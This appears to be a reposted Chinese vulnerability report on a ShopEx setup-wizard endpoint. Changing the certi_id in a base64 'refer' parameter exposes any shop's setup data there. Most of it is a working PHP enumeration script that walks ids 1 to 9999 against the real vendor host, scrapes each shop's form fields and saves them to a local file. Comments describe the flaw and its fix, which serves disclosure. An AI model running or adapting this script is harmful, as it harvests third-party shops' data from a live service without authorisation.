|
|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=

refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}

我们修改certi_id 即可遍历所有使用了ShopEx程序的网站

<?php
// Proof of concept from the report above: the guide endpoint reads certi_id
// from the client-supplied, base64-encoded "refer" query parameter and renders
// that shop's setup form without checking that the caller is entitled to that
// certi_id (an insecure direct object reference). The server-side remedy is to
// derive certi_id from the authenticated session, or to sign the refer blob, so
// that an arbitrary value in the query string is rejected.

// Walk candidate certificate ids 1..9999; every page that resolves is dumped
// by ShowshopExD().
foreach (range(1, 9999) as $certiId) {
    ShowshopExD($certiId);
}

/**
 * Fetch the step2 wizard page for one certificate id and, when the response
 * echoes the supplied refer blob back, print each text-input name:value pair
 * and append it to c:/shopEx.txt.
 *
 * @param mixed $cid candidate certi_id; coerced with intval() before use
 * @return void
 */
function ShowshopExD($cid) {
    $endpoint = 'http://guide.ecos.shopex.cn/step2.php';
    // Only certi_id varies between requests; callback_url is a fixed dummy.
    $refer = base64_encode(
        '{"certi_id":' . intval($cid) . ',"callback_url":"http:\/\/www.a.com\/"}'
    );

    $ch = curl_init($endpoint . '?refer=' . $refer);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
    // The page is transcoded so the Chinese form labels print readably in a
    // GB2312 console.
    $page = mb_convert_encoding(curl_exec($ch), "gb2312", "UTF-8");

    // A response is treated as a hit only when it reflects the refer blob.
    if (strpos($page, $refer)) {
        $out = fopen("c:/shopEx.txt", 'ab');

        // Collect the attribute text of every <input type="text" .../> tag.
        preg_match_all('/<input\stype="text"(.*?)\/>/', $page, $inputs);
        foreach ($inputs[1] as $attrs) {
            preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/', trim($attrs), $m);
            $line = $m[1][0] . ':' . $m[3][0] . "\r\n";
            echo $line;
            fwrite($out, $line, strlen($line));
        }

        echo '--------------------------------' . "\r\n";
        fclose($out);
    }

    flush();
    curl_close($ch);
}
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式
|
|